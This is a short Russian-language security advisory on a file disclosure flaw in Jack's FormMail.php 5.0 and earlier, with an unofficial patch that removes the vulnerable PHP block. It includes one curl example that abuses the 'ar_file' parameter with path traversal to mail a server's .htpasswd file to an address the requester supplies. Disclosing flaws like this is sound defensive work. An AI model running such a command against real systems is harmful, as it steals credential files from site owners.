Просмотр произвольных файлов в Jack's FormMail.php

Дата публикации:
03.01.2005
Всего просмотров:
898
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Jack's FormMail.php 5.0 и более ранние версии

Описание:
Обнаружена уязвимость в Jack's FormMail.php. Удаленный пользователь может просмотреть файлы на уязвимой системе.

Удаленный пользователь может определить значение для переменной автоматического ответа 'ar_file' и отправить по почте произвольный файл на уязвимой системе. Пример:

# curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d
email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php

URL производителя: http://dtheatre.com/scripts/formmail.php

Решение: Решение не существует на данный момент.
Неофициальный патч:
Вы можете удалить следующие строки из сценария FormMail.php:

if (file_exists($ar_file)) {
$fd = fopen($ar_file, "rb");
$ar_message = fread($fd, filesize($ar_file));
fclose($fd);
mail_it($ar_message, ($ar_subject)?stripslashes($ar_subject):"RE:
Form Submission", ($ar_from)?$ar_from:$recipient, $email);
}


Ссылки: Jack's FormMail.php 'ar_file' Parameter Lets Remote Users Obtain Files from the System

или введите имя

CAPTCHA